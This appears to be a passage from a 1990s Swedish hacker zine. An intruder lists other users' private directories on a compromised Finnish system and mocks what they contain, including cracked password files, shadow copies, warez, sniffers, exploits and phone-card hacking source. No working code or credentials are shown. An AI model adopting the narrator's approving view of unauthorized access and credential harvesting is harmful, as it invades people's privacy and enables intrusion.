-rw-r--r-- 1 candyman nighteam 24004 Aug 18 13:25 .fvwmrc
-rw-r--r-- 1 candyman nighteam 24002 Aug 18 12:49 .fvwmrc~
-rw-r--r-- 1 candyman nighteam 164 Jul 10 1995 .kermrc
-rw-r--r-- 1 candyman nighteam 34 Jun 6 1993 .less
-rw-r--r-- 1 candyman nighteam 114 Nov 24 1993 .lessrc
-rw-r--r-- 1 candyman nighteam 1 Dec 5 11:24 .login
-rw-r--r-- 1 candyman nighteam 25 Dec 1 10:41 .login~
-rw-r--r-- 1 candyman nighteam 0 Nov 6 16:07 .mc.ini
-rw-r--r-- 1 candyman nighteam 503 Nov 6 16:07 .mc.tree
drwx------ 2 candyman nighteam 1024 Jan 12 12:51 .ncftp
-rw------- 1 candyman nighteam 118 Dec 12 12:18 .ncrecent
drwx------ 3 candyman nighteam 1024 Dec 20 15:44 .netscape
-rw-r--r-- 1 candyman nighteam 2625 Jan 12 14:32 .netscape-bookmarks.html
drwx------ 2 candyman nighteam 24576 Jan 12 18:47 .netscape-cache
-rw------- 1 candyman nighteam 17401 Jul 25 13:18 .netscape-history
-rw-r--r-- 1 candyman nighteam 148361 Jul 24 10:53 .netscape-newsgroups-news
-rw-r--r-- 1 candyman nighteam 1686 Jan 12 14:30 .netscape-preferences
-rw------- 1 candyman nighteam 0 Jan 10 12:33 .news_time
-rw-r--r-- 1 candyman nighteam 13714 Jan 12 13:32 .newsrc
-rw-r--r-- 1 candyman nighteam 258392 Nov 20 14:59 .newsrc.8728
drwx------ 2 candyman nighteam 1024 Sep 4 20:38 .nn
-rw-r--r-- 1 candyman nighteam 13709 Jan 12 13:21 .oldnewsrc
-rw------- 1 candyman nighteam 712 Jan 11 13:24 .pine-interrupted-mail
-rw-r--r-- 1 candyman nighteam 5529 Jan 12 15:36 .pinerc
-rw-r--r-- 1 candyman nighteam 480 Jan 10 11:48 .plan
-rw-r--r-- 1 candyman nighteam 454 Dec 22 09:24 .plan~
-rw-r--r-- 1 candyman nighteam 58 Nov 15 14:55 .project
-rw-r--r-- 1 candyman nighteam 58 Nov 8 17:10 .project~
-rw-r--r-- 1 candyman nighteam 17 Sep 4 21:32 .signature
-rw-r--r-- 1 candyman nighteam 15 Oct 20 20:05 .slirprc
-rw-r--r-- 1 candyman nighteam 23 Oct 20 19:52 .slirprc~
-rw-r--r-- 1 candyman nighteam 63 Jan 12 13:19 .tcshrc
-rw-r--r-- 1 candyman nighteam 33 Jan 10 12:43 .tcshrc~
drwxr-xr-x 2 candyman nighteam 1024 Aug 25 13:49 .term
drwxr-xr-x 4 candyman nighteam 1024 Jan 12 13:32 .tin
-rw-r--r-- 1 candyman nighteam 94 Aug 18 12:35 .xinitrc
-rw-r--r-- 1 candyman nighteam 66 Aug 18 12:19 .xinitrc~
-rw-r--r-- 1 candyman nighteam 118372 Dec 19 16:33 Configure.help-1.3
drwxr-xr-x 9 candyman access 1024 Dec 14 14:29 Linux
drwx------ 2 candyman nighteam 1024 Nov 24 10:21 Mail
drwx------ 2 candyman nighteam 1024 Nov 24 10:21 News
drwx------ 3 candyman nighteam 1024 Oct 26 23:05 build
drwx------ 22 candyman nighteam 1024 Dec 14 15:44 download
drwx------ 5 candyman nighteam 1024 Dec 13 11:26 graphics
drwxr-xr-x 2 candyman nighteam 1024 Oct 12 12:33 html
-rwxr-xr-x 1 root root 8752 Jan 10 12:14 linuxfin.txt
drwx------ 2 candyman nighteam 1024 Jan 12 10:50 mail
-rw------- 1 candyman nighteam 1971 Jan 10 16:28 mbox
drwx------ 3 candyman nighteam 1024 Dec 13 12:39 netscape
drwx------ 2 candyman nighteam 2048 Oct 12 11:23 news
drwx------ 2 candyman nighteam 1024 Oct 10 13:10 para-proc
drwx------ 2 candyman nighteam 1024 Dec 7 14:54 prosa
drwx------ 2 candyman nighteam 1024 Jan 10 11:54 shadow
drwx------ 4 candyman nighteam 1024 Oct 12 11:29 source
drwxrwx--- 5 candyman access 1024 Jan 12 18:50 teddy
drwx------ 2 candyman nighteam 1024 Jan 10 10:47 tmp
Well, han hade en hel del skit.. Men i tmp kanske det finns ngt roligt..
Lat oss checka..
/private/candyman/tmp:
total 20
drwx------ 2 candyman nighteam 1024 Jan 10 10:47 .
drwxr-xr-x 24 candyman nighteam 2048 Jan 12 15:36 ..
-rw-r--r-- 1 root root 1470 Dec 15 00:25 aliases
-rwx------ 1 candyman nighteam 3617 Aug 8 17:52 evitech.fi
-rwx------ 1 candyman nighteam 250 Aug 11 11:44 guessed
-rwx------ 1 candyman nighteam 9 Aug 8 17:49 katjahmr
-rw-r--r-- 1 root root 5091 Jan 9 14:20 passwd
-r-------- 1 root root 3504 Jan 9 14:27 shadow
Hehe, joda.. Det skulle jag nog vilja saga.. Tre av filerna har han tydligen
satt upp nar han kort med root oxa.. Well, kanske ska beratta vad som
dojlde sig bakom nagra av filnamnen oxa.. Aven om de ar ratt sjalv
forklarande.. guessed inneholl nagra crackade passwd's till evitech.fi.
Det var tydligen crackat med Crack 4.1 kan jag ju oxa saga.. katjahmr
inneholl passwordet till usern katjahmr pa evitech.fi.. (Ett annat
password till samma konto fanns i guessed, sa de har antagligen bytt password
at henne..)
Ska well fortsatta, och kika lite pa vad pone kan dolja..
/private/pone:
total 5274
-rw-r--r-- 1 pone nighteam 44156 Dec 20 15:32 #sit.fi.sorted#
-rwx------ 1 pone nighteam 1399 Dec 4 09:00 %backup%~
drwxr-xr-x 24 pone nighteam 2048 Jan 12 08:45 .
drwxrwxr-x 4 root root 1024 Nov 26 20:27 ..
-rwx------ 1 pone nighteam 1246 Jan 12 08:41 .addressbook
-rw-r--r-- 1 pone nighteam 2573 Jan 12 08:41 .addressbook.lu
-rw------- 1 pone nighteam 542 Dec 20 16:45 .article
-rwx------ 1 pone nighteam 756 Dec 20 18:51 .cshrc
-rwx------ 1 pone nighteam 733 Dec 2 13:51 .cshrc~
-rw-r--r-- 1 pone nighteam 15 Dec 20 13:01 .forward
-rwx------ 1 pone nighteam 164 Jul 10 1995 .kermrc
-rwx------ 1 pone nighteam 34 Jun 6 1993 .less
-rwx------ 1 pone nighteam 114 Nov 24 1993 .lessrc
-rw-r--r-- 1 pone nighteam 6 Nov 26 20:42 .logout
-rwx------ 1 pone nighteam 25 Aug 14 03:12 .mailcap~
-rw-r--r-- 1 pone nighteam 0 Dec 20 08:53 .mc.ini
-rw-r--r-- 1 pone nighteam 70 Dec 20 08:53 .mc.tree
-rwx------ 1 pone nighteam 357 Aug 10 06:10 .netscape-bookmarks.html
drwxr-xr-x 2 pone nighteam 11264 Nov 24 19:50 .netscape-cache
-rwx------ 1 pone nighteam 91 Aug 10 06:10 .netscape-cookies
-rwx------ 1 pone nighteam 12923 Aug 14 04:13 .netscape-history
-rwx------ 1 pone nighteam 1568 Oct 23 20:22 .netscape-preferences
-rwx------ 1 pone nighteam 0 Jan 12 13:46 .news_time
-rw-r--r-- 1 pone nighteam 290356 Dec 20 19:39 .newsrc
-rw-r--r-- 1 pone nighteam 259272 Oct 15 17:02 .newsrc.20926
-rw-r--r-- 1 pone nighteam 159420 Dec 20 16:47 .oldnewsrc
drwxr-xr-x 2 pone nighteam 2048 Oct 29 20:11 .pics
-rw-r--r-- 1 pone nighteam 5657 Jan 12 08:45 .pinerc
-rw-r--r-- 1 pone nighteam 494 Aug 28 02:48 .plan
-rw-r--r-- 1 pone nighteam 12 Aug 28 02:50 .project
-rwx------ 1 pone nighteam 414 Dec 20 17:51 .signature
-rwx------ 1 pone nighteam 415 Nov 17 12:27 .signature~
drwx------ 2 pone nighteam 1024 Sep 19 09:04 .term
drwxr-xr-x 4 pone nighteam 1024 Dec 21 01:36 .tin
-rwx------ 1 pone nighteam 89 Aug 7 22:08 .xinitrc
-rw-r--r-- 1 pone nighteam 65792 Nov 16 22:44 690v100.img
drwx------ 2 pone nighteam 1024 Jul 28 13:02 Mail
drwx------ 2 pone nighteam 1024 Jul 28 13:02 News
-rw-rw-r-- 1 pone nighteam 15262 Nov 21 14:26 PPP-HOWTO.gz
-rw-r--r-- 1 pone nighteam 208339 Nov 21 19:38 alt.2600_FAQ,_Beta_.012_-_Part_1_1
-rw-r--r-- 1 pone nighteam 6133 Nov 21 19:38 alt.2600_Survival_Guide
drwxrwxr-x 2 pone nighteam 1024 Nov 16 09:33 arlan
dr-x------ 2 pone nighteam 1024 Nov 27 03:25 crontabs
-rw-r--r-- 1 pone nighteam 3877 Jan 11 18:14 cute.fi
-rw------- 1 pone bin 477 Dec 18 15:37 dead.letter
drwxr-xr-x 4 pone nighteam 1024 Nov 24 11:28 docs
drwxr-xr-x 4 pone nighteam 1024 Nov 30 20:32 download
-rwx------ 1 pone nighteam 216 Nov 6 21:09 falm
drwxr-xr-x 3 fear users 1024 Dec 11 16:02 fear
-rwx------ 1 pone nighteam 485 Nov 20 18:17 fmasi
-rwx------ 1 pone nighteam 485 Nov 20 18:16 fmasi~
-rwx------ 1 pone nighteam 238 Nov 6 21:21 fmm
-rwx------ 1 pone nighteam 437 Nov 6 21:41 fpone
-rw-r--r-- 1 pone nighteam 2076 Nov 1 20:18 homepage.html
-rw-r--r-- 1 pone nighteam 2001 Nov 1 19:57 homepage.html~
drwxr-xr-x 13 pone nighteam 1024 Dec 2 15:31 html
-rwx------ 1 pone nighteam 307 Dec 18 16:50 iafmail
-rwx------ 1 pone nighteam 312 Dec 18 16:50 iafmail~
-rw-r--r-- 1 pone nighteam 856989 Nov 23 11:49 ingres04.tar.Z
-rwx------ 1 pone nighteam 312 Nov 16 20:34 innomail
-rwx------ 1 pone nighteam 301 Nov 16 20:33 innomail~
drwxr-xr-x 3 pone nighteam 1024 Jan 12 01:57 log
-rw-r--r-- 1 pone nighteam 198 Dec 2 17:38 loggi
-rw------- 1 pone nighteam 1535 Nov 29 11:21 loki
drwxr-xr-x 2 pone nighteam 12288 Aug 25 13:30 lost+found
drwx------ 2 pone nighteam 1024 Jan 12 08:54 mail
-rwx------ 1 pone nighteam 588 Dec 2 13:43 masi
-rwx------ 1 pone nighteam 586 Nov 27 09:48 masi~
drwxr-xr-x 2 pone nighteam 1024 Dec 2 18:10 matts
-rw------- 1 pone nighteam 105106 Nov 28 17:50 mbox
drwxr-xr-x 2 root root 1024 Nov 24 11:47 mqueue
-rw------- 1 pone nighteam 1562829 Nov 24 20:38 nag.ps
-rw------- 1 pone nighteam 1562833 Nov 24 20:37 nag.ps~
drwx------ 2 pone nighteam 1024 Aug 7 01:34 news
drwxr-xr-x 7 nordman users 2048 Nov 28 14:55 nordman
-rw-r--r-- 1 pone nighteam 1620 Jan 11 18:28 otech.fi
drwx------ 2 pone nighteam 1024 Oct 15 16:51 passwd
-rwx------ 1 pone nighteam 542 Nov 28 13:09 pone
-rwx------ 1 pone nighteam 501 Nov 27 10:05 pone~
-rwx------ 1 pone nighteam 1435 Nov 27 03:05 q~
-rwxr--r-- 1 pone nighteam 1333 Nov 26 21:12 rooter
-rwxr--r-- 1 pone nighteam 1333 Nov 26 21:10 rooter~
-rwxr-xr-x 1 pone nighteam 438 Oct 27 18:40 setter
-rw-r--r-- 1 pone nighteam 44156 Dec 20 15:23 sit.fi
-rw-r--r-- 1 pone nighteam 44156 Dec 20 15:27 sit.fi.sorted
-rwx------ 1 pone nighteam 302 Jul 28 12:17 staffmail
-rwx------ 1 pone nighteam 301 Nov 15 13:54 studmail
-rwx------ 1 pone nighteam 302 Nov 15 13:54 studmail~
lrwxrwxrwx 1 pone nighteam 17 Dec 20 09:19 talk -> /usr/bin/talk.old
drwx------ 2 pone nighteam 1024 Jan 12 18:57 temp
drwx------ 4 pone nighteam 1024 Oct 15 16:53 texts
-rw-r--r-- 1 pone nighteam 811 Dec 19 14:24 trlog
Lite diverse passwd-filer fanns ju dar, blandannat.. I .pics fanns det porr..
(Onodigt att slosa utrymme i maget med en listning..) I download/win95/
fanns det en hel del w4r3z.. Hittar overhuvudtaget en hel del w4r3z och porr
lite overallt.. Sa jag hoppar direkt vad jag hittar i hacking-vag..
/private/pone/passwd:
total 5
drwx------ 2 pone nighteam 1024 Oct 15 16:51 .
drwxr-xr-x 24 pone nighteam 2048 Jan 12 08:45 ..
-rw------- 1 pone nighteam 376 Oct 15 16:12 ftp.aragorn.uio.no
-rw------- 1 pone nighteam 183 Oct 15 16:14 ftp.batnet.com
Tja, dar fanns tva passwd-filer.. Som han har varit lam nog att ta via ftp..
Bada var fake passwd's.. Well, over till /private2 da..
/private2:
total 22
drwxrwxr-x 13 root TheDudez 1024 Jan 12 12:56 .
drwxr-xr-x 20 root root 1024 Jan 10 11:37 ..
drwxrwxr-x 2 ripper TheDudez 1024 Nov 22 11:10 Linux
drwxrwx--- 4 paul TheDudez 1024 Jan 9 19:41 Stuff
drwxrwx--- 4 paul TheDudez 5120 Jan 9 13:07 Warez
drwxrwxr-x 2 kea TheDudez 1024 Dec 15 14:46 algdata
-rwxrwx--- 1 kea TheDudez 396 Nov 28 13:25 htmler
-rwxr-x--- 1 ripper TheDudez 410 Nov 28 13:16 htmler.old
drwxr-xr-x 19 kea TheDudez 2048 Jan 12 18:27 kea
drwxr-xr-x 3 paul TheDudez 1024 Nov 28 14:13 library
drwxr-xr-x 23 paul TheDudez 2048 Jan 12 12:37 paul
drwxr-xr-x 13 ripper TheDudez 1024 Dec 29 01:57 phrack
drwxr-xr-x 25 ripper TheDudez 2048 Jan 12 17:09 ripper
drwxr-xr-x 2 paul TheDudez 1024 Jan 12 12:57 santtu.dellas.ner.jag.orkar.JUH
drwxr-xr-x 10 ted TheDudez 1024 Dec 28 19:06 ted
Tja, som ni ser.. Warez igen.. I Stuff fanns bland annat en passwd-fil igen..
I Warez, inte sa ovantat warez... I kea, som verkar vara webadmin, fanns
passwd-filer och crackade konton.. I paul fanns en massa porr, en del warez
och en del passwd-filer.. Har ar vad som fanns i phrack..
/private2/phrack:
total 22
drwxr-xr-x 13 ripper TheDudez 1024 Dec 29 01:57 .
drwxrwxr-x 13 root TheDudez 1024 Jan 12 12:56 ..
-rw-r--r-- 1 ripper TheDudez 3072 Feb 14 1995 anarch.zip
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 11:49 aotd
drwxr-xr-x 2 ripper TheDudez 2048 Sep 26 11:56 ati
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 11:58 btr
drwxr-xr-x 2 ripper TheDudez 4096 Sep 26 12:20 cdc
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 12:34 dfp
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 12:35 fbi
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 12:39 informatik
drwxr-xr-x 2 ripper TheDudez 2048 Sep 26 12:52 kaos
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 12:58 lodcom
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 13:05 lol
drwxr-xr-x 2 ripper TheDudez 2048 Sep 26 13:44 misc
En hel del hp-zines har de samlat pa sig.. Och i misc, en massa blandade
hp-texter och utils.. Har ar ripper's dir..
/private2/ripper:
total 1190
drwxr-xr-x 25 ripper TheDudez 2048 Jan 12 17:09 .
drwxrwxr-x 13 root TheDudez 1024 Jan 12 12:56 ..
drwxr-xr-x 4 ripper TheDudez 3072 Nov 14 18:25 ..html
drwxr-xr-x 2 ripper TheDudez 1024 Sep 6 13:27 .LiCe
drwxr-xr-x 2 ripper TheDudez 1024 Sep 7 17:41 .a
-rw-r--r-- 1 ripper TheDudez 215 Sep 21 12:39 .addressbook
-rw-r--r-- 1 ripper TheDudez 1492 Sep 21 12:39 .addressbook.lu
-rw------- 1 ripper TheDudez 541 Dec 29 01:38 .article~
-rw-r--r-- 1 ripper TheDudez 41 Sep 21 19:55 .bash_history
-rw-r--r-- 1 ripper TheDudez 846 Nov 21 15:52 .cshrc
-rw-r--r-- 1 ripper TheDudez 846 Nov 9 20:50 .cshrc~
drwx------ 2 ripper TheDudez 1024 Jul 26 20:43 .elm
-rw-r--r-- 1 ripper TheDudez 41 Jan 11 12:53 .forward
-rw-r--r-- 1 ripper TheDudez 19 Jan 11 12:53 .forward_bara_forward
-rw-r--r-- 1 root root 41 Jan 9 14:02 .forward_old
-rw-r--r-- 1 ripper TheDudez 112 Jul 26 20:04 .ircrc
-rw-r--r-- 1 ripper TheDudez 164 Jul 10 1995 .kermrc
-rw-r--r-- 1 ripper TheDudez 34 Jun 6 1993 .less
-rw-r--r-- 1 ripper TheDudez 114 Nov 24 1993 .lessrc
-rw------- 1 ripper TheDudez 859 Jan 10 12:02 .letter~
-rw-r--r-- 1 ripper TheDudez 84 Aug 1 22:23 .login
-rw-r--r-- 1 ripper TheDudez 0 Dec 29 01:55 .mc.ini
-rw-r--r-- 1 ripper TheDudez 1328 Dec 29 01:55 .mc.tree
drwxr-xr-x 2 ripper TheDudez 1024 Dec 27 00:00 .ncftp
-rw------- 1 ripper TheDudez 0 Jan 12 17:06 .news_time
-rw-r--r-- 1 ripper TheDudez 2292 Jan 12 17:09 .newsrc
-rw-r--r-- 1 ripper TheDudez 2292 Jan 12 17:07 .oldnewsrc
-rw-r--r-- 1 ripper TheDudez 5488 Jan 12 17:06 .pinerc
-rw-r--r-- 1 ripper TheDudez 404 Sep 1 13:58 .plan
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 14:44 .procmail
-rw-r--r-- 1 ripper TheDudez 152 Sep 26 14:50 .procmailrc
-rw-r--r-- 1 ripper TheDudez 19 Aug 14 20:42 .project
-rw-r--r-- 1 ripper TheDudez 408 Jan 12 17:06 .signature
-rw-r--r-- 1 ripper TheDudez 465 Nov 9 20:48 .signature.old
-rw-r--r-- 1 ripper TheDudez 405 Aug 25 08:04 .signature~
drwx------ 2 ripper TheDudez 1024 Sep 19 08:10 .term
-rw------- 1 ripper TheDudez 639 Jul 29 06:07 .tia
drwxr-xr-x 4 ripper TheDudez 1024 Jan 12 17:09 .tin
drwxr-xr-x 12 ripper TheDudez 2048 Dec 28 21:54 Crack-4.1
-rw-r--r-- 1 ripper TheDudez 14939 Oct 30 07:18 Dip+SLiRP+CSLIP_v1.1
drwx------ 2 ripper TheDudez 1024 Sep 12 14:16 Mail
drwxr-xr-x 2 ripper TheDudez 4096 Jan 12 17:09 News
drwxr-x--- 2 ripper TheDudez 1024 Oct 31 17:29 bin
drwxr-xr-x 3 ripper TheDudez 1024 Sep 19 17:23 cipher
-rw-r--r-- 1 ripper TheDudez 770 Jan 9 13:08 crontab
-rw-r--r-- 1 ripper TheDudez 812635 Dec 26 23:55 de220e.exe
-rw-r--r-- 1 ripper TheDudez 819 Dec 28 21:45 dead.article
-rw------- 1 ripper bin 1121 Oct 21 23:16 dead.letter
drwxr-xr-x 2 ripper TheDudez 1024 Aug 14 20:56 dev
drwxr-xr-x 4 ripper TheDudez 1024 Nov 30 15:32 html
drwx------ 2 ripper TheDudez 1024 Jan 12 14:59 mail
-rw-r--r-- 1 ripper TheDudez 3003 Sep 26 19:48 mailer
drwxrwxr-x 2 ripper TheDudez 1024 Oct 26 15:53 mits
drwxr-xr-x 3 ripper TheDudez 1024 Nov 9 17:57 nc
drwxr-xr-x 2 ripper TheDudez 1024 Nov 24 21:42 net
-rw-r--r-- 1 ripper TheDudez 101455 Sep 19 19:20 net-tools-1.2.0.tar.gz
-rw-r--r-- 1 ripper TheDudez 396 Nov 9 20:47 output
-rw------- 1 ripper TheDudez 682 Sep 26 14:34 passu
-rw-r--r-- 1 ripper TheDudez 45056 Nov 6 11:37 passwd
drwxrwxr-x 2 ripper TheDudez 2048 Jan 12 11:01 pics
-rw-r--r-- 1 ripper TheDudez 95486 Sep 20 10:21 roots.net
drwxr-xr-x 3 ripper TheDudez 1024 Aug 31 19:42 screen
-rw-r--r-- 1 ripper TheDudez 8755 Sep 21 19:32 shcrack.c
-rw-r--r-- 1 ripper TheDudez 9716 Sep 21 19:37 spoof.c
-rw-r--r-- 1 ripper TheDudez 642 Sep 21 19:39 spoof.doc
drwxr-xr-x 2 ripper TheDudez 1024 Dec 7 23:46 stuff
-rw-r--r-- 1 ripper TheDudez 6155 Sep 28 16:31 sunny.sh
-rwx------ 1 ripper TheDudez 2277 Nov 9 20:49 taggit
-rw-r--r-- 1 ripper TheDudez 2002 Nov 9 20:33 tags
drwxr-xr-x 2 ripper TheDudez 1024 Dec 5 15:19 test
-rw-r--r-- 1 ripper TheDudez 21859 Nov 13 11:36 uucp.how
Well, en login-spoof, sniffers, passwd-filer, exploits, porr, cracker-prog,
crackade passwd-filer, en ratt fin samling dict-filer, krypterings-progs..
Heh, ripper skulle nastan kunna vara en av oss! :) Men.. Kanske inte precis
vad man vill ha som sysadm.. I ripper's mail fanns lite ql info oxa..
Detaljerad beskrivning och pascal-src for att gora en smartcard-lasare,
koppla in den till sin PC, och med programmet programmera om telefon-kort..
Programmet passade for kort fran Norge, Irland, Czech Republic (!?) och
Finland.. Hehe.. Well, det fanns en hel del tvivelaktiga saker pa det har
systemet..
<EOF>
